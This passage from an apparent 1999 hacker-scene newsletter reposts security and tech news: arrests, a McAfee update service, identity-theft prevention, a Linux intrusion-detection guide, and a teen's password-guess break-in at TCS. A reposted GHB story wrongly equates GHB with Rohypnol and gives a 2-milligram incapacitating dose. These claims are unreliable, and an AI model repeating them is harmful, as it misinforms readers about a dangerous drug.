a rule, feel that way. As a rule, they pretty much feel like they should get
compensated.

Artists, a lot of artists, deserve to be, need to be, want to be seen as technology-friendly. And I think if we can
provide a safe space for them to be able to do that and still protect their interests, that's O.K..

Q: If you had to draw a pie chart of how you spend your time, I guess the Internet is taking a bigger
piece of the pie. How has that changed over the last two years?
A: I would say that four years ago, it was 10%, and now it's 90%. It's a lot. Although I've had a heavy six
months on violence in music, too. Music has always represented some social rebellion, and the Internet has
become a socially rebellious child, in essence, for a lot of mainstream business and parents. For everybody
else who is used to a certain way of life, the Internet is just banging on their door, just like that nasty rock and
roll that you wish would leave your daughter alone.

Q: So over time, the Internet may put more power into independent labels? In the next couple of
years, the independents may take more of the pie?
A: I actually don't think that the pie stays the same size. I think the pie expands.

Q: How long does it take record companies to realize that?
A: Maybe it took a minute longer than it took every other smart person in the world, but they're there.

The majors take a lot of knocks for being slow to come to this thing. And, you know, some of it deservedly
so. But I think that also a business reporter would understand this because, they're sitting on billions of dollars
of assets on behalf of artists and their companies.

[Nearly] 99% of their sales are still in bricks and mortar retail. That's a huge responsibility, [and explains] the
concept that they were a little more thoughtful about how to go forward in this space than a kid changing the
world, sitting in his mom's bedroom with his own computer.

@HWA

13.0 ReDaTtAcK CHARGED ANYWAYS
~~~~~~~~~~~~~~~~~~~~~~~~~

  

From http://www.net-security.org/

by Thejian, Tuesday 17th August 1999 on 8:35 pm CET
ISP Belgacom Skynet, which was compromised by the hacker ReDaTtAcK last
week, has after an initial statement that they wouldn't press charges decided to do a
180 and charge him anyways. This is after the hacker sent the ISP a fax himself to
inform them about the holes in their systems.

@HWA

14.0 NA/MCAFEE RELEASES NEW VIRUS SERVICE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

by Thejian, Tuesday 17th August 1999 on 3:05 am CET
Network Associates will this week unveil its ActiveShield service, which will deliver
anti-virus software updates to users' computers whenever they are connected to the
Internet. In this way users will receive fixes as soon as they are made availble. Read
more

--------------------------------------------------------------
This story was printed from Inter@ctive Week,
located at http://www.zdnet.com/intweek.
--------------------------------------------------------------

McAfee Launches New Virus Service
By Mel Duvall, Inter@ctive Week
August 16, 1999 1:15 PM PT
URL: http://www.zdnet.com/intweek/stories/news/0,4164,2315320,00.html

Network Associates will unveil technology this week that it said will revolutionize the process of
keeping computers updated with the latest anti-virus software.

The security firm's McAfee division will launch its ActiveShield service through its McAfee.com
Web site, which will deliver anti-virus software updates to users' computers whenever they are
connected to the Internet.

Anthony Kim, manager of McAfee Clinic, said the software has the potential to limit the damage
caused by such outbreaks as the Melissa virus, because users will receive fixes as soon as they are
available.

The ActiveShield software pings the McAfee server daily to check for software updates, patches
or fixes. It gives the user the option of downloading and installing the fix, or doing it at a later date.

McAfee will price ActiveShield at $39.95 for a yearly subscription. But, for a limited time, it will
be $19.95.

@HWA

15.0 TWO CHARGED WITH PROMOTING "DATE-RAPE" DRUG ON THE NET
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

by Thejian, Tuesday 17th August 1999 on 2:50 am CET
Two man have been charged by the Michigan attorney general in connection with
allegedly promoting the sale and at-home manufacture of the "date-rape" drug.
Attorney General Jennifer M. Granholm, D, also said the two men have been filed with
notice to stop within 10 days the sale of the so-called "kits" to make the drug, or face
additional criminal charges and penalties of up to 90 days in jail, a $5,000 fine, or
both. For now they have been charged with one count of solicitation to manufacture a
controlled substance and face a maximum of 30 years in jail if convicted. Newsbytes

Two Charged With Promoting Date-Rape Drug Via The Net

http://www.newsbytes.com/pubNews/99/134907.html


By Bob Woods, Newsbytes
LANSING, MICHIGAN, U.S.A.,
16 Aug 1999, 3:21 PM CST

Two men who live outside Michigan have been charged by that state's attorney general in connection with
allegedly promoting the sale and at-home manufacture of the controversial drug gamma- hydroxybutyrate
(GHB), better known as the "date-rape drug."

Attorney General Jennifer M. Granholm, D, also said the two men have been filed with notice to stop within 10 days the sale
of the so-called "kits" to make the drug, or face additional criminal charges and penalties of up to 90 days in jail, a $5,000
fine, or both.

The action marks the first time a criminal prosecution has been initiated as a result of selling GHB over the Internet, attorney
general spokesperson Chris DeWitt told Newsbytes today.

Both Carl Gorton, 63, of Merritt Island, Fla., and John Hedrick, 22, of Colorado Springs, Co., are now were charged with one
count of solicitation to manufacture a controlled substance. Charges were filed in 36th Judicial District Court in Detroit.

Gorton and Hedrick now face felony charges and a maximum penalty of 30 years in jail, if convicted. Gorton was at large as
of this afternoon, while Hedrick had been arrested and is now out on bond, DeWitt said.

GHB, which is marketed as Rohypnol, is also known as roofies, liquid ecstasy, liquid X and organic Quaalude, among other
names. A 2-milligram (mg) dose of GHB can result in unconsciousness within 20 minutes of ingestion, usually through a
drink laced with the drug. The next morning, the person who took the drug has no memory of the previous evening's events.

Gorton and Hedrick "knowingly and intentionally" solicited undercover agents from the attorney general office's new High
Tech Crime Unit to make GMB through the sale of a "do-it-yourself" GHB ingredient kit, authorities say.

A Website owned by Gorton allegedly advocated and encouraged the use of GHB, and stated that the company can offer
"legally available GHB" because it has "concluded that the chemical components could be sold as a kit and combined by
customers at home without special equipment, all of which is safe and perfectly legal," Granholm's office also said.

"Selling a dangerous, controlled substance on the Internet doesn't make it safe, and it certainly doesn't make it legal,"
Granholm said in a statement.

The alleged action occurred via the Website sponsored by "Centurian Aging Research Laboratory" (CARL). The CARL
Website included an order form that directed customers to send cash or money orders to a post office box registered to
Hedrick, the attorney general's office also said.

The Website is no longer active, DeWitt said.

GHB, under Michigan law, is a Schedule 1 controlled substance, which makes it illegal to use, manufacture or possess the
drug in the Wolverine State. Soliciting or inducing the manufacture of such controlled substances is also illegal.

DeWitt said the attorney general was within the scope of her office to go after the two suspects. "It would be no different if
someone called a person in Indiana to buy heroin, and it was then shipped (to Michigan)," he said.

Granholm's High Tech Crime Unit is made up of three assistant attorneys general, one investigator, and support staff,
DeWitt said. The team, which is a part of the attorney general office's criminal division, deals with illegal activities conducted
via the Internet on both a criminal and civil basis.

"With the Internet becoming more and more available, there are those who will take advantage of other people," he added.

Reported By Newsbytes.com, http://www.newsbytes.com .

15:21 CST
Reposted 16:51 CST

@HWA

16.0 E-COMMERCE AND PRIVACY
~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

by Thejian, Tuesday 17th August 1999 on 2:45 am CET
NFO Interactive conducted a survey on how netizens feel about e-commerce and
privacy. The survey polled more than 4.500 Internet users of which 1.944 had never
made an online purchase. Nearly 70 percent of that number would make online
purchases if they had assurances that their privacy would be guaranteed. More on
this survey

Online Consumers Demand E-Commerce Privacy - Study

http://www.newsbytes.com/pubNews/99/134914.html

By David McGuire, Newsbytes
WASHINGTON, DC, U.S.A.,
16 Aug 1999, 4:19 PM CST

The majority of Internet users who are not currently participating in e-commerce would be more likely make
purchases online if they felt comfortable that their privacy would be guaranteed, a soon-to-be- released study
found.

Nearly 70 percent of those netizens who have yet to make an Internet purchase would be enticed to do so if they had
assurances that their privacy would be protected, the survey found. Conducted by NFO Interactive, the survey polled more
than 4,500 Internet users. Nearly half of those polled (1,944) had never made an online purchase.

"It's going to be the (online) merchant's responsibility to educate the users" about privacy protections, NFO Director of
Research Tim Washer told Newsbytes today.

Other factors that reticent Internet users said would encourage them to make purchases online included deeper price
discounts (65 percent) and the ability to return defective or unwanted products to a physical location (28 percent).

Washer also stressed the potential value of independent online privacy "seal-of-approval" programs, such as those offered by
Truste and BBBOnLine. By funding, promoting and participating in those programs, e-merchants could help ameliorate some
consumer concerns about privacy, he contended.

Among the attributes survey participants said would attract them to a retail Website were: strong privacy protection
standards; access to secure purchasing servers; overall technical reliability; up-to-date content; and timely delivery.

The NFO study comes on the heels of another survey, released last week, that indicated nearly a third of all Internet users
make purchases online.

That survey, conducted by CDB Research & Consulting, found that apprehension about online shopping is dissipating as
e-commerce sites improve security procedures and make information about security more readily available.

Further information on the NFO study, "Online Retail Monitor: Branding, Segmentation & Web Sites" is available on NFO's
Website, located at http://www.nfoi.com/nfointeractive/nfoipr81699.asp .

Reported by Newsbytes.com, http://www.newsbytes.com .

16:19 CST
Reposted 16:53 CST

17.0 IDENTITY-THEFT
~~~~~~~~~~~~~~

From http://www.net-security.org/

by Thejian, Tuesday 17th August 1999 on 2:30 am CET
Anyone seen the Net? Infoworld has a story on identity-theft, people who instead of
stealing from you, "become you". Your name, social security number, driver's license
number, credit record.. all can easily be hijacked. "It would never happen to me" is a
common response, but according to this article more than 500.000 people fall victim
to this "social engineering attack" in the US every year. Infoworld

August 16, 1999

Future criminals will not need to steal from
you -- they will simply `become you'

What would you say if we told you that we could "become you" if we
wanted? Establish (or ruin) your credit, cash checks, obtain a driver's license
or passport, even commit crimes -- all in your name. The sad fact is that your
name, social security number, driver's license number, credit record --
essentially what defines you in modern society -- can be easily hijacked.

"It would never happen to me" is a common response to what seems
inconceivable. The fact is, every year in the United States more than
500,000 people fall victim to this social engineering attack. And it can be one
of the most invasive, exhaustive experiences you'll ever endure.

Why do so many people each year fall prey to the identity-theft vultures of
the world? Simply put, we're too trusting. We preprint our home addresses
(and even our driver's license numbers) on our checks. We give out our
home phone number to anyone who asks. We throw sensitive bills, as well
as bank and credit statements, in the trash. The bottom line is that we, as a
society, make it too easy to become victims.

By far, the biggest opportunity for an identity thief is not by digging through
your trash or overhearing your phone number. Instead, the best time for a
thief to garner precious information is during a move. The situation provides
such a ripe opportunity for an attacker to pick up box after box of
identity-defining information such as birth certificates, social security
numbers, paycheck stubs, credit card numbers, and other personal effects.
Together, these belongings represent ample means for an attacker to obtain a
driver's license, password, and credit card.

We've accumulated a small collection of helpful hints to prevent identity theft.
Start by purchasing a cross-cut shredder for your home and business: Every
document you throw away should be carefully reviewed for sensitive
information. Never freely give out information such as address, phone
number, or driver's license number -- and never give out your social security
number (unless required to). Once your awareness is heightened, you'll be
surprised at how many people ask you for these personal items.

Obtain a post office box, and use it whenever someone requires an address.
Using your credit card over the Internet is fine, just be sure the Web site
employs SSL for card number encryption.

To get a handle on identity theft, you should also read Identity Theft: the
Cybercrime of the Millennium, by John Q. Newman, and 21st Century
Revenge: Down and Dirty Tactics for the Millennium, by Victor Santori.
Both books are from Loopanics Unlimited and give you a solid foundation
on the techniques used by thieves.

All this is little help to those who have already fallen victim to an attack.
Here's what you can do after turning into a statistic.

- Inform the three main credit-reporting bureaus -- Equifax, Experian,
and Trans Union -- by phone and letter. Ask that no new credit be
approved without your notification beforehand.

- Inform all of your current credit card and loan companies about the
theft.

- Inform all of the check-monitoring agencies, such as CheckRite,
Chexsystems, etc.

- Make sure your police department files a report on the crime, or your
future identity-theft claims may fall on deaf ears.

- Obtain a new driver's license, and inform the department of motor
vehicles that you suspect identity fraud.

- As a last resort, especially if the thief has used your social security
number to obtain credit in your name, request a new social security
number. However, be careful with this step because it can make it
difficult for you to get credit in the future.

The physical security of one's identity is as critical as any virtual electronic
bits and bytes floating through a silicon wafer or a copper wire. As more of
the components of physical identity become translated into digital form, the
two will become intrinsically intertwined.

For more details on identity theft, visit www.identitytheft.org,
www.privacyrights.org, and www.futurecrime.com.

Send your anecdotes and precautions to security_watch@infoworld.com.

@HWA


18.0 Y2K-THE MOVIE
~~~~~~~~~~~~~

From http://www.net-security.org/

by BHZ, Tuesday 17th August 1999 on 1:53 am CET
Nice theme for a film - Y2K. NBC will use millennium madness and try to earn money
on it. In Y2K, the bug causes an East Coast power outage, ATM failures, airliners
whose instruments don't work and other assorted calamities. Main character battles
one of the biggest imagined consequences of the bug when a nuclear power plant
threatens to go into meltdown.

@HWA

19.0 19 ARRESTED ON CHILD PORNOGRAPHY CHARGES
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

by BHZ, Tuesday 17th August 1999 on 1:45 am CET
The National Criminal Intelligence Service started a unit that will try to catch on-line
pedophiles and similar perverts. Insp Terry Jones, the head of the squad, said that the
unit monitored few chat rooms for 60 hours - and as a result they arrested 19
suspects. In addition to pedophiles, the unit will investigate some other criminal
activities conducted via computers (for instance illegal gambling, blackmail, industrial
espionage). Note: read the ACPO (www.antichildporn.org) article in Default #1 here.

http://default.net-security.org/1/14.htm

XIV. Guest column
-----------------

This weeks guest column is by Natasha Grigori of the ACPO, a cause which Help Net
Security supports fully.

The mission of ACPO, and our goals:

ACPO is a non-profit Group formed to actively seek out and stop the
exploitation of children on the Internet. Our focus is to protect our
children from the predatory and perverse criminal elements that seek to
destroy their innocence. While we are firmly in favor of free speech in
all its forms, especially on the Internet, we are opposed to the active
sexual exploitation of children. We have chosen to act against the
dissemination of child pornography over the Internet. Our motivation is
the fact that there is a genuine connection between the distribution and
acceptance of pedophile pornography and actual incidents of sexually
abused children. Not to mention that all-existing hardcore pedophile
pornographic material is the result of very real abuse. Our children are
our future, as such we must protect them as we would our own lives and
in doing so ensure a better future for us all.

Our secondary focus is to educate. We want to provide individuals and
organizations training about the Internet and its associated risks. We
will counsel law enforcement on the Internet aspects of gathering
information and evidence. We pursue all of our goals with the ethical
and moral values of most anybody confronted with this abhorrent
practice. We will tolerate only approaches, and condone no illegal
activities. Failure to abide by the ACPO operations standards is ground
enough for revocation of ACPO membership.

Our goals can be broken down as follows:

1. Provide a maximum of information to concerned law enforcement
authorities, including activity hotspots on the Internet and the results
of our own investigations into the activities of online child
pornographers.
2. Put a halt to sensationalism and hype regarding the Internet while
promoting quality investigative journalism on pedophile pornography.
3. Create enough public pressure to bring authorities to the point of
action.
4. Form a cooperative with other Internet groups with similar goals,
which will benefit us all and increase our impact. We are working to
provide a website to which our members will be able to turn for
information and resources, and will add other means of communication.
Our approach is somewhat different from other organizations, in that we
are combining the drive for wide public support with the knowledge of
Internet experts.

This is our first public description of our mission. We view this as a
work in progress that will continue to be refined.

If you have any questions or concerns about our Mission Statement,
please feel free to mail me at Natasha@infovlad.net You should get a
response from me with in a week, possibly less. And BTW look for our
exciting news next Friday.


============================
Thanks for being 'Child-Friendly'
Natasha Grigori Founder
ACPO http://www.antichildporn.org/
http://www.infovlad.net/antichildpornorg/
mailto:natasha@infovlad.net
============================

@HWA

20.0 Y2K PROBLEMS
~~~~~~~~~~~~

From http://www.net-security.org/

by BHZ, Tuesday 17th August 1999 on 1:37 am CET
Y2K situation will ruin some companies. TriMark Engineering, small company behind
the Doorway program published on their site that: "I am happy to announce that ALL
released versions of the Doorway program are y2k compliant...Unfortunately the
computers used in our operations are not y2k compliant. These computers were
purchased and used before Windows 95, and are all old DOS systems. They are not
compliant and we do not have the resources to make them compliant".
http://execonn.com/doorway

@HWA

21.0 GISB WILL USE PGP
~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

by BHZ, Tuesday 17th August 1999 on 1:29 am CET
Gas Industry Standards Board (GISB) decided that for securing transactions over the
Internet, they will use PGP (Pretty Good Privacy) technology rather than the more
popular standard developed by RSA - S/MIME (Secure/Multipurpose Internet Mail
Extension). More on the story on Internet Week.

http://www.techweb.com/se/directlink.cgi?INW19990816S0032

August 16, 1999, Issue: 777
Section: Systems & Management

Utilities Choose PGP Encryption Over S/MIME
Rutrell Yasin

Suppliers of natural gas now have a standard way of securing electronic
transactions between trading partners.

While the Gas Industry Standards Board joins a growing list of vertical
industry consortia forming such standards, it is among the first major groups to
chose PGP (Pretty Good Privacy) encryption and authentication technology
rather than the more popular S/MIME (Secure/Multipurpose Internet Mail
Extension) standard developed by RSA.

The GISB's decision to adopt PGP for its 165 corporate members-which
include Amoco, Exxon, Mobil, Con Edison and Pennsylvania Power & Light
Co.-is a major endorsement for PGP. This choice came from the fact that
PGP is file-based, providing data encryption for both e-mail and file-based
data.

Also, the group felt it was better suited for its requirements, which include data
privacy, integrity, authentication and nonrepudiation.

While the S/MIME standard also supports those core functions, it is intended
only for e-mail encryption. The GISB has been experimenting with PGP since
1996, before S/MIME became a standard, according to Carl Caldwell,
chairman of the GISB's electronic delivery mechanism committee.

GISB was looking at ways to send encrypted EDI files, using HTTP as a
transport, "but at the time, SSL [Secure Sockets Layer] was owned by
Netscape, and we didn't want to pick one specific Web server and browser,"
Caldwell said. Plus, "we needed a file-based security product."

Though S/MIME is the de facto standard for e-mail encryption and an
Internet Engineering Task Force draft specification, as well, the IETF is
working on AS2, a convergent standard that will let companies securely
exchange EDI files, using HTTP as a transport. EDI data will be packaged in
MIME messages that use public key security, Caldwell said.

PGP will help the GISB member companies secure more than 37 different
types of business transactions, from ordering space on a pipeline to moving
gas to paying for it once it reaches its destination, GISB officials said.

Based on GISB's choice of PGP, the Federal Energy Regulatory Commission
(FERC) has mandated that all members of the gas industry implement PGP
2.6 or greater to secure electronic transactions, said Carl Caldwell, chairman
of GISB's electronic delivery mechanism subcommittee.

GISB and FERC's adoption of a standard for the gas industry is a move in the
right direction, said Phil Schacter, an analyst at the Burton Group. "I like the
model of a community defining [standards]."

Still, Schacter wondered whether there would be interoperability issues
between companies using PGP 2.6 and those using newer versions with RSA
and X.509 certificates. However, Network Associates, which acquired PGP
Inc. last year and is the major supplier of PGP-based software, said it has
backward-compatible versions.

From its origins as shareware software, PGP has emerged as a de facto
standard for data encryption among consumer users and individuals, but not
many large companies are using it on an enterprise and extranet basis.
Nevertheless, under the auspices of Network Associates, PGP is evolving into
a more flexible, robust product for the corporate world, industry analysts said.

Network Associates has "broadened the scope of the application, [adding]
support for RSA [encryption] and X.509 digital certificates," Schacter said.
PGP supports other standards, such as Secure Sockets Layer (the
predecessor to the IETF-backed Transport Layer Security protocol) as well
as OpenPGP and the Lightweight Directory Assistance protocol. Network
Associates offers an integrated suite, called PGP Enterprise Security.

PGP's broadened scope is one reason GISB is adopting the technology as a
standard, said Rae McQuade, executive director of the standards
organization.

"We were attempting to develop a standard [that would operate] over a wide
variety of hardware, operating systems and programming languages," she said.

Copyright ® 1999 CMP Media Inc.

@HWA

22.0 SURF ANONYMOUS FOR $5
~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

by BHZ, Tuesday 17th August 1999 on 1:23 am CET
Earlier this year we published that nearly 93 percent of commercial Web sites collect
some type of personal data from visitors to their sites. Many privacy related
companies are working on solutions that will help users to stay anonymous. Small
maker of privacy software Privada (www.privada.net) announced today their program
Web Incognito, a product that will allow users to surf the Web and send e-mail
anonymously.

@HWA

23.0 HACKER LAUNCHES GRUDGE-ATTACK AGAINST FORMER EMPLOYER
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

by Thejian, Monday 16th August 1999 on 1:30 pm CET
A 23-year-old hacker, was sentenced for two charges of unlawful modification of
computer material and two of unauthorised access to a computer to 3 years in jail
and his computer was confiscated. Scott Reid, 23, hacked into the Vodaphone short
messaging network, sending a message in text form to 32,000 international
subscribers telling them they had won a Peugeot 106 car and must ring a certain
number to claim it. The number he quoted was that of GS (UK), a Nottingham firm
supplying software for the embroidery industry, where he had previously worked. The
result, Nottingham Crown Court was told, was that the firm's business was brought to
a standstill which caused an estimated 10.000 pound loss in business. Besides that
he also infected the computer systems of this company with a trojan horse named
"Colourmatch". It appears the attacks were carried out because of a grudge Reid had
against his former employer because of a terminated project of his. This was reported
in the Daily Telegraph, thanx to ladysharrow for contributing.

@HWA

24.0 PROJECTGAMMA BACK ONLINE
~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

by Thejian, Monday 16th August 1999 on 1:00 pm CET
The populair underground site Project Gamma (pG) has returned after an unfortunate
30-day downtime. Darkridge Security Solution (DSS), the organization that is kind
enough to provide hosting for pG, relocated their networks. After the networks
relocated, it was approximately 14-days before the vhost was restored; that was the
cause of the DSS Web site being displayed on the projectgamma.com domain. Visit
Projectgamma.com
http://www.projectgamma.com/

@HWA

25.0 DETECTING INTRUDERS IN LINUX
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

by Thejian, Sunday 15th August 1999 on 11:30 pm CET
Here's an article on system intruders in Linux. Besides dealing with how to monitor
your system and in this way detect the intruders, it also speaks about how to be
prepared for the event your systems get compromised. Because face it, intrusions
CAN happen to anyone. Read it

http://securityportal.com/direct.cgi?/topnews/tn19990816.html

Detecting Intruders in Linux


Read this week's other cover story about auditing Cisco routers
August 16, 1999 - An intrusion into your network and host systems by persons
unknown is one of the biggest nightmares for systems administrators. Many of us
don't even want to think about the possibility of this happening, or feel that our
perimeter security makes a serious intrusion a remote possibility. However,
intrusions can happen to anyone, on any public or private network. In order to
best detect and respond to an intrusion, you must first plan for an intrusion, then
have all the appropriate monitoring capabilities deployed.

Plan for an intrusion

Develop a baseline of normal operating conditions. To do this, you should audit the file system, network services,
logon activity, normal CPU load, disk utilization, etc. It is important to get a sense of what log files normally look like. A
very skilled attacker may leave little evidence of their presence, and only a full system audit can help you detect
subtle system variations later. The tools to perform audits range from the simple and familiar utilities, such as netstat,
to get network statistics and ps/top, to get CPU stats to more complex tools, such as Tripwire and Logcheck.
Tripwire takes a snapshot of your complete file system and generates an MD5 hash of the files, which can be
compared with a later snapshot to find any file system variation. Logcheck, part of the Abacus tool set, is a program
that automatically will run and check system log files for security violations and unusual activity. Running these tools
on a system that is in a pristine state before it is put into production can yield valuable information down the road.
Backups - the obligatory statement that solid backups are the only way to be certain that you can recover from an
intrusion is inserted here. Your Red Hat Package Manager (RPM) database can be a key indicator of system tampering,
so it should be backed up after package adds, deletes and changes. Also make sure you have a clean copy of the
bin/rpm binary. RPM's abilities for version control and discovering file dependencies really allow it to shine in warning of
file integrity problems.
Build an offline kit of standard system utilities. Depending upon how quick you are in detecting an intruder, you
may or may not be able to trust normal utilities, like ls, ps, top, mount, cp, mv or grep, to help you detect tampering.
A skilled attacker may substitute their own version of ls and top for example, which conveniently filter out rogue
daemons they have installed. You should have clean copies of these utilities ready to use.
Develop a response plan. A response plan can be as simple or complex as necessary, based upon the value of the
systems being protected. Who gets notified, what gets shut down, how long do we have to return to normal operating
status are all questions to be answered. The key benefit to ID planning is that we are reacting quickly and
appropriately to an intrusion instead of wasting critical time deciding what to do. A network based denial of service
attack may require that you immediately disable network services, possibly by unplugging the host from its hub. If
there has been a local compromise and malicious programs are running on the host, it may need to be shutdown
immediately. If this is an extremely crucial production host, response plans can get complex, but it still is usually better
to shut the system down, as you may be racing against a person or program that is two steps ahead of you.

Perform Network based monitoring

One element of intrusion detection is tracking activity on your network segments. Host-based intrusion detection will
tell you the attacks that reached the host and how successful they are. Network monitoring can alert you to attacks
occurring through out your network, although it may not give you information about how successful those attacks
were.
Look for stations entering or leaving your network segments. Arpwatch is a utility that will track new active MAC
addresses on your network segment. If you have an SNMP console at your disposal as well as manageable hubs or
switches, these will also be able to spot new stations coming online on your network.
Look for network sniffers. Trying to find network sniffers may be a difficult job, as they are listening to traffic, but
not transmitting anything. Neped is a utility available on Trinux that looks for stations with their NIC set to
promiscuous mode, a sure sign of a sniffer. This is not a fullproof tool, but it may be able to catch some sniffers,
particularly those based on an older Linux kernel. Some commercial sniffers have tell tale signatures, they may
broadcast a licensing packet to look for unauthorized copies of their product.
Ngrep. This is a nifty utility that you may want to run on a special management station. Ngrep uses libpcap to capture
all of your network traffic and lets you use pattern matching and filtering expressions like grep to look for specific
activities, such as all attempts to telnet to your web server. Be aware that modern ethernet switching can make it
very difficult to see all the traffic on your network. Running ngrep on a shared hub with a specific host, or perhaps
your ISP router may allow you to capture the traffic you are looking for. Some switches have the capability to "mirror"
traffic, and send all of the data from one port to another for diagnostics purposes.

Perform Host based scanning

Running the same tools used for the baseline audit on a regularly scheduled basis is a good way to validate system
integrity and look for subtle break ins. In addition, there are utilities that you may want to run on a real time monitoring
basis to find problems. Some examples:
Swatch, the Syslog Watchdog. This is a lightweight Perl program that continuously monitors SYSLOG for security
issues and can dial a pager to report exceptions.
Tiger. Written by Texas A&M in response to their own security break-in, this is actually several scripts that can be
scheduled to check a wide variety of possible vulnerabilities, such as weak permissions, and can also perform cleanup
of scratch files that may have plain text security information in them.
Tcp_wrappers is probably the most powerful way to monitor connections to network services on your host in real
time. Tcp_wrappers can log incoming connections and filter them based upon additional security criteria. Tcp_wrappers
works by tricking inetd into calling it before invoking a network service, such as your telnet or ftp daemons.
Tcp_wrappers then logs the connection and either passes the connection on the the appropriate service, such as
telnetd, or denies the connection altogether. Tcp_wrappers takes an investment in time to get the most out of it, but
is an exceptional program for providing proactive monitoring and filtering of network connections to your host.
Building secure systems is not an adequate approach to maintaining long term host security. By developing solid
intrusion detection plans, performing comprehensive security audits, and scanning both network segments and host
systems, we will have a much better chance at successful intruder detection.


@HWA

26.0 WIRELESS CRIME-FIGHTING
~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

by Thejian, Sunday 15th August 1999 on 11:00 pm CET
Two California communities are being protected by police officers with patrol car
access to crime databases and records. A new wireless mobile communication and
information system from PacketCluster Patrol software allows officers to do
background checks in the record system securely from their cars. Crime-fighting of
the future? CNN

http://cnn.com/TECH/computing/9908/12/wirelesscop.idg/index.html

Wireless crime-fighting

August 12, 1999
Web posted at: 3:51 p.m. EDT (1951 GMT)

by Dan Caterinicchia
From...



(IDG) -- Two California communities are being protected by police officers
with patrol car access to crime databases and records, thanks to a new
wireless mobile communication and information system.

PacketCluster Patrol software, produced by Cerulean Technology Inc.,
Marlborough, Mass., gives the Salinas/Monterey County Mobile Computer
Terminal Consortium access to crime-fighting data directly from patrol
car-based laptop computers.

Using the wireless network, more than 400 patrol officers in the consortium
can access records management systems and county, state and federal
databases. The officers can access secure information from one or more of
the databases in a matter of seconds with a single query.

"To be able to share records was previously unheard of.... We couldn't do it
over the radio because of the privileged nature of the information, but now
officers can do background checks on the system securely, right in their
cars," said Sgt. Tracy Molfino of the Salinas Police Department.

"Before, we didn't have the communication
between agencies, either in person or
through a third party," Molfino said. "Now
we have cross-jurisdictional communication,
and the whole system is progressing in an
appropriate fashion."

The PacketCluster Patrol system uses
wireless modems to link the consortium's
100-plus patrol cars to criminal and motor
vehicle databases.

Officers can communicate with each other
through the system. It also provides the
option of cross-referencing previous cases
and arrests with variables including
identification information, such as
birthmarks and scars, and crime patterns in
certain locations.

An unexpected bonus is that officers can run registration checks on a vehicle
to see if its license plates or registration tags have been reported stolen. With
the high price of tags in California, that service is being used daily, Molfino
said.

The alliance has four members and will be adding eight more through a
recently awarded federal grant from the Community Oriented Policing
Services' Making Officer Redeployment Effective program. With its new
members, the consortium plans to expand its wireless ability by integrating a
geographic information system application.

"With our soon-to-be 12 members, every geographic area of Monterey
County will be pulled together into one communications network," Molfino
said. "The system is only about three-quarters installed, and we're already
getting 10,000 queries a month."

@HWA

27.0 15-YEAR-OLD ADMITS HACKING INTO TCS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

by Thejian, Sunday 15th August 1999 on 6:20 pm CET
By using password "news" along with the same username, a 15-year-old boy hacked
into two Television Corporation of Singapore websites. Nice description here of how
even simple password guessing can compromise a system. Full story

http://www.straitstimes.asia1.com/cyb/cyb1_0813.html

Boy, 15, admits hacking into TCS
websites

He made an educated guess at a user name "news"
and used it as the password. He got into the TCS
server

By PAULINE LEONG

LUCK and ingenuity enabled a 15-year-old boy to hack
into two Television Corporation of Singapore (TCS)
websites on the Internet.

He made an educated guess at a user name "news" and
used the same word as the password. He got into the
TCS server.

He told another teenager, 18, about it and they both
logged on several times, disrupting the web pages for
about 10 hours.

Yesterday, the younger boy pleaded guilty in the
Juvenile Court to four charges of unauthorised entry and
disclosure of password.

Four other charges will be taken into consideration in his
sentencing.

A pre-sentence report will be submitted before the
judge decides on the punishment. On June 15 this year,
the Secondary 2 student was watching TV at home
when he saw an advertisement showing the Internet
address www.mediacity.com.sg.

He decided to visit the website and used a software
function in his computer to connect to the Mediacity
server.

After trying various combinations of user names and
passwords to get into the server, he struck gold with
"news". He started exploring the directories and files
there.

Then he told the 18-year-old whom he had met chatting
on the Internet that the server had security weaknesses.
He also told him the access code "news".

The older boy, an O-level student in a private school,
logged on, using a "wingate" to mask his identity. This is
a proxy server used to avoid detection.

On his advice, the younger boy also used a wingate.

The older boy told him to look for more access codes,
in case the system administrator disabled their "news"
account.

The boy found a file called "passwd" which contained all
the authorised user names and their corresponding
encrypted passwords.

He then told the older boy the new user names and
passwords, "informix" in particular, and they both used
them.

The younger boy was arrested seven days later at his
home in Clementi. The 18-year-old has been charged.

Defence lawyer David Nayar said in mitigation that the
15-year-old was curious and merely guessed at the
access code "news".

According to the lawyer, the boy did not alter any
documents or files, but in his excitement, revealed the
access code to another person.

He added that the boy has since regretted his actions.

A first offender, the 15-year-old is the younger of two
boys in his family. His father is a product engineer and
his mother, a housewife.

They have already banned him from using the Internet.

@HWA

28.0 JAPAN CLEARS WIRETAP BILL
~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/

by Thejian, Sunday 15th August 1999 on 6:00 pm CET
Japan's upper house of parliament has approved a controversial bill that gives police
the power to intercept communications such as telephone calls and Internet e-mail as
part of their investigations into organised crime. Untill now, Japan had been the only
G8 nation which did not use wiretapping in the course of criminal investigations. Read
more below

http://www.technologypost.com/internet/DAILY/19990813103941567.asp?Section=Main


Published on Friday, August 13, 1999

INTERNET

Communications
interception Bill clears
Japan's upper house

NEWSBYTES

Lawmakers in Japan's upper house of parliament
approved yesterday a controversial bill that gives police
the power to intercept communications such as
telephone calls and Internet e-mail as part of their
investigations into organised crime.

Having already cleared the lower house, the vote was
the final hurdle to the bill becoming law.

Japan had been the only G8 nation which did not use
wiretapping in the course of criminal investigations.

Lawmakers approved a package of three Bills designed
to help police fight organised crime but it was the
communications interception bill that prompted the most
debate and argument.

The Bill is designed to help police battle organised crime
and as such restricts the interception of communications
to cases involving illegal drugs, weapons, organised
group illegal entry into Japan, and organised murders.

Campaigners against the bill have a number of fears.
